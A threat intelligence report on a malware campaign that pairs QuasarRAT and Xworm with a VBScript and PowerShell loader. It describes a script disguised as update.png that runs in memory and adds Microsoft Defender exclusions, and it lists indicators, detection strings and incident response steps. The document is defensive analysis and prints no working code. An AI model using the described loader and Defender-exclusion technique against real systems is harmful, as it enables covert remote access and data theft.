Campaign Identifier: QuasarRAT-Xworm-PowerShell-Campaign

Last Updated: October 17, 2025

BLUF (Bottom Line Up Front)

Executive Summary

Business Impact Summary

The QuasarRAT + Xworm + PowerShell campaign represents a sophisticated multi-stage attack combining commodity remote access trojans with advanced fileless execution techniques. The attack systematically disables security controls and establishes persistent remote access, creating significant data theft and system control risks.

Key Risk Factors

Risk Factor Score Business Impact
Security Control Disabling 9/10 Complete Microsoft Defender bypass enabling unrestricted malicious activity
Fileless Execution 8/10 Memory-based execution evades traditional file-based detection methods
Remote Access Trojans 8/10 Full system control with data theft, surveillance, and lateral movement capabilities
Persistence Mechanisms 7/10 Long-term unauthorized access with multiple RAT deployment options
  1. ISOLATE potentially compromised systems from network immediately
  2. RESTORE Microsoft Defender functionality and remove all exclusions
  3. SCAN all systems for QuasarRAT and Xworm binaries
  4. AUDIT PowerShell execution logs for suspicious script blocks
  5. BLOCK access to known malicious infrastructure (dns4up.duckdns.org, 193.233.164.21)
  6. RESET all credentials for potentially compromised accounts

Table of Contents

Quick Reference

Detections & IOCs:

Overview

This campaign combines commodity RATs (QuasarRAT and Xworm) with a VBScript + PowerShell loader.
The loader disguises its payload as an image (update.png) but actually downloads and executes a PowerShell script in memory.
That script disables Microsoft Defender by adding broad exclusions, then facilitates RAT deployment.

Loader Mechanism

  • VBScript stager constructs a PowerShell command string.
  • PowerShell execution uses .NET System.Net.Http.HttpClient to fetch update.png from a remote server.
  • Despite the .png extension, the file is a text‑based PowerShell script, not an image.
  • The script is read into memory, compiled into a [ScriptBlock], and executed immediately with .Invoke().

Defense Evasion

The PowerShell payload disables Microsoft Defender by adding exclusions for:

  • Entire C:\ drive.
  • Processes: powershell.exe, wscript.exe, cmd.exe, cvtres.exe.

This effectively blinds Defender to subsequent malicious activity.

RAT Deployment

Once exclusions are in place, the loader hands off to RAT binaries:

  • QuasarRAT: .NET‑based remote access trojan, ~2–3 MB, often with configs embedded in resources.
  • Xworm: smaller (~70 KB), obfuscated strings, commodity RAT functionality.
    Both provide persistence, remote control, and data theft capabilities.

Technical Analysis

Infrastructure Overview

Infrastructure Component Value Role in Attack Chain
Dynamic DNS Domain dns4up.duckdns[.]org Primary C2 domain for RAT communication
Hosting IP 193.233.164.21 Infrastructure hosting malicious payloads
Payload Disguise update.png PowerShell script disguised as image file

Attack Chain Components

Component Technology Purpose
Initial Loader VBScript Constructs PowerShell execution command
Delivery Mechanism PowerShell + .NET HttpClient Downloads and executes malicious script in memory
Defense Evasion PowerShell exclusions Disables Microsoft Defender completely
Primary RAT QuasarRAT (.NET) Full-featured remote access trojan (~2-3 MB)
Secondary RAT Xworm Lightweight commodity RAT (~70 KB)

Tactics, Techniques, and Procedures (TTPs)

  • Fileless execution: PowerShell loads and executes script content directly in memory.
  • Defense evasion: Microsoft Defender exclusions.
  • Remote access: RAT deployment for persistence and control.
  • Living off the land: Abuse of legitimate scripting engines (VBScript, PowerShell).

Pivoting Strategy

Analysts can pivot on:

  • File names: update.png, update.ps1.
  • Strings: Add-MpPreference, ExclusionPath, HttpClient.GetAsync.
  • Domains/IPs: DuckDNS subdomains, 193.233.164.21.
  • Malware traits: QuasarRAT’s embedded configs, Xworm’s obfuscation patterns.

Final Summary

This campaign demonstrates a layered loader strategy:

  1. VBScript launches PowerShell.
  2. PowerShell fetches a disguised payload (update.png).
  3. Payload disables Defender and executes in memory.
  4. RATs (QuasarRAT, Xworm) are deployed for persistence and remote control.

Key insight: the .png extension is a deliberate misdirection — the payload is a PowerShell script, not an image.
This is a classic “living off the land” technique, leveraging native scripting tools for stealth and evasion.

Attack Tactics & Procedures

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Implementation
Execution T1059.001 PowerShell Fileless PowerShell script execution in memory
Defense Evasion T1562.001 Disable or Modify Tools Microsoft Defender exclusions via Add-MpPreference
Persistence T1543.003 Windows Service RAT deployment for long-term access
Command and Control T1071.001 Application Layer Protocol: Web Protocols HTTP/HTTPS communication with C2 infrastructure
Living off the Land T1218.005 System Tools Abuse of legitimate VBScript and PowerShell

Threat Hunting Indicators

Indicator Type Value Hunting Method
File Names update.png, update.ps1 File system monitoring, EDR alerts
PowerShell Strings Add-MpPreference, ExclusionPath, HttpClient.GetAsync PowerShell logging, script block analysis
Network Indicators dns4up.duckdns.org, 193.233.164.21 DNS monitoring, network traffic analysis
Malware Signatures QuasarRAT configs, Xworm obfuscation Memory analysis, YARA rules

Incident Response Procedures

Priority 1: Initial Response

  1. ISOLATE potentially compromised systems from network
  2. RESTORE Microsoft Defender functionality and remove all exclusions
  3. SCAN all systems for QuasarRAT and Xworm binaries
  4. AUDIT PowerShell execution logs for suspicious script blocks
  5. BLOCK access to known malicious infrastructure (dns4up.duckdns.org, 193.233.164.21)
  6. RESET all credentials for potentially compromised accounts

Priority 2: Investigation & Analysis

  1. FORENSIC ANALYSIS of PowerShell logs for script block execution
  2. MEMORY ANALYSIS for fileless execution artifacts
  3. NETWORK ANALYSIS for connections to C2 infrastructure
  4. MALWARE ANALYSIS of recovered RAT binaries
  5. THREAT HUNTING for additional compromised systems and lateral movement

Priority 3: Remediation & Recovery

  1. REBUILD compromised systems from known-good images
  2. RESET all credentials for potentially compromised accounts
  3. IMPLEMENT PowerShell logging and monitoring
  4. DEPLOY application whitelisting for script execution
  5. ESTABLISH enhanced endpoint detection and response capabilities

Operational Impact Assessment

Impact Scenarios

Impact Category Severity Level Recovery Time
Data Compromise HIGH extended period
System Compromise HIGH several weeks
Operational Disruption MEDIUM several weeks
Security Control Recovery HIGH several weeks
Long-term Monitoring MEDIUM extended period
Compliance Impact HIGH extended period

Operational Impact Timeline

  • Immediate Response: System isolation, security control restoration, emergency response
  • Investigation Phase: System rebuilding, enhanced monitoring deployment, credential rotation
  • Recovery Phase: Process improvements, security hardening, user training
  • Long-term Phase: Security architecture review, compliance activities
  • Extended Phase: Ongoing monitoring and regulatory compliance

Operational Impact Timeline

  • Immediate: System isolation, security control restoration, emergency response
  • Short-term: System rebuilding, enhanced monitoring deployment
  • Medium-term: Process improvements, security hardening
  • Long-term: Security architecture review, compliance activities

Long-term Defensive Strategy

Technology Enhancements

  1. Endpoint Detection & Response (EDR) with fileless execution capabilities and behavioral analysis
  2. Application Control to prevent unauthorized script execution and unknown software deployment
  3. PowerShell Constrained Language Mode with restrictive execution policies and enhanced logging
  4. Advanced Threat Protection with real-time fileless attack detection and memory forensics
  5. Network Traffic Analysis for C2 communication detection and anomaly identification
  6. Security Information and Event Management (SIEM) with PowerShell integration and correlation rules
  7. Cloud Access Security Broker (CASB) for monitoring cloud-based exfiltration attempts

Process Improvements

  1. PowerShell Logging with script block logging, module logging, and transcription capabilities
  2. Application Whitelisting for script execution, file downloads, and PowerShell commands
  3. Regular Security Assessments including penetration testing of endpoint defenses and fileless attack simulations
  4. Incident Response Playbooks specific to fileless malware attacks and RAT remediation
  5. Change Management procedures with security approval requirements and rollback capabilities
  6. Threat Hunting Program with regular hunts for fileless attack indicators and RAT infrastructure

Organizational Measures

  1. Security Awareness Training on social engineering, malicious scripts, and RAT detection
  2. Regular Security Assessments including red team exercises and fileless attack scenarios
  3. Threat Intelligence Subscription for emerging fileless malware threats and RAT infrastructure monitoring
  4. Executive Security Briefings on living-off-the-land attack techniques and business impact
  5. Investment in Security Tools and personnel training for advanced threat detection and response
  6. Security Champions Program to promote security culture and incident reporting

Resource Investment Summary

  • Technology Investment: EDR and advanced protection deployment across endpoints
  • Training Investment: Security awareness and specialized training for personnel
  • Process Investment: Security program development and maintenance activities
  • Total Investment: Comprehensive fileless attack protection capabilities
  • Expected Outcome: Prevention of fileless attack incidents and improved detection capabilities

Frequently Asked Questions

Technical Questions

Q: Why is fileless execution particularly dangerous?
A: It evades traditional file-based detection methods, leaves minimal forensic artifacts, and can bypass many security controls that rely on file scanning.

Q: How does PowerShell exclusion mechanism work?
A: The script uses Add-MpPreference to add exclusions for the entire C: drive and specific processes, effectively blinding Microsoft Defender to all subsequent activity.

Q: What makes the .png disguise effective?
A: Many security tools and network monitoring systems may not inspect files with image extensions as closely as executable files, allowing the PowerShell script to bypass initial filters.

Business Questions

Q: What are the regulatory implications of security control disabling?
A: Significant - disabling security controls can be considered willful negligence and may impact compliance with various security frameworks and regulations.

Q: Should we rebuild or patch compromised systems?
A: REBUILD is strongly recommended due to the sophistication of fileless attacks and the potential for additional hidden compromise mechanisms.

Q: How can we prevent similar fileless attacks?
A: Implement PowerShell logging, application control, endpoint detection with fileless execution capabilities, and user education on malicious scripts.

IOCs

Detections

License

© 2025 Joseph. All rights reserved.
Free to read, but reuse requires written permission.